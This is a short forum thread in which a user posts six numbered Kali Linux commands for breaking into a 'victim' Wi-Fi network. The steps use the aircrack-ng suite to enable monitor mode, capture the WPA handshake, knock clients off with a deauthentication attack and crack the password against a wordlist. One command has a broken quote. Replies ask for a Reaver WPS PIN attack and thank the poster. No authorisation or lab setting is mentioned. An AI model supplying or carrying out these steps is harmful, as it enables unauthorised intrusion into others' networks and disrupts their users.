Wifi Brute Force Attack

Talk About what ever you want here, try not to spam.
User avatar
Dark Hack
Posts: 11
Joined: Thu Dec 07, 2017 12:39 am

Wifi Brute Force Attack

Postby Dark Hack » Thu Dec 07, 2017 12:45 am

OS Kali Linux

Brute Force Attack !

Step 1:

#ifconfig

Step 2:

#airmon-ng start wlan0

Step 3:

#airodump-ng mon0 (or wlan0)

Step 4: Handshake

#airodump-ng -c (fill the channel) --bssid (Macaddress of the victim) -w (example: "/root/Desktop/ mon0

Step 5:

#aireplay-ng -0 2 -a (BSSID) -c (station) mon0

Step6:

#aircrack-ng -a2 -b (BSSID) -w (WordList Dir) (cap file)

User avatar
Velli aslan
Posts: 9
Joined: Fri Dec 08, 2017 5:21 am

Re: Wifi Brute Force Attack

Postby Velli aslan » Fri Dec 08, 2017 5:29 am

Bro show other method with Kali Linux and Reaver to brute force router PIN

User avatar
firesquad
Posts: 9
Joined: Mon Jan 15, 2018 11:34 pm

Re: Wifi Brute Force Attack

Postby firesquad » Mon Jan 15, 2018 11:49 pm

thanks bro very helpful


Return to “General Discussion”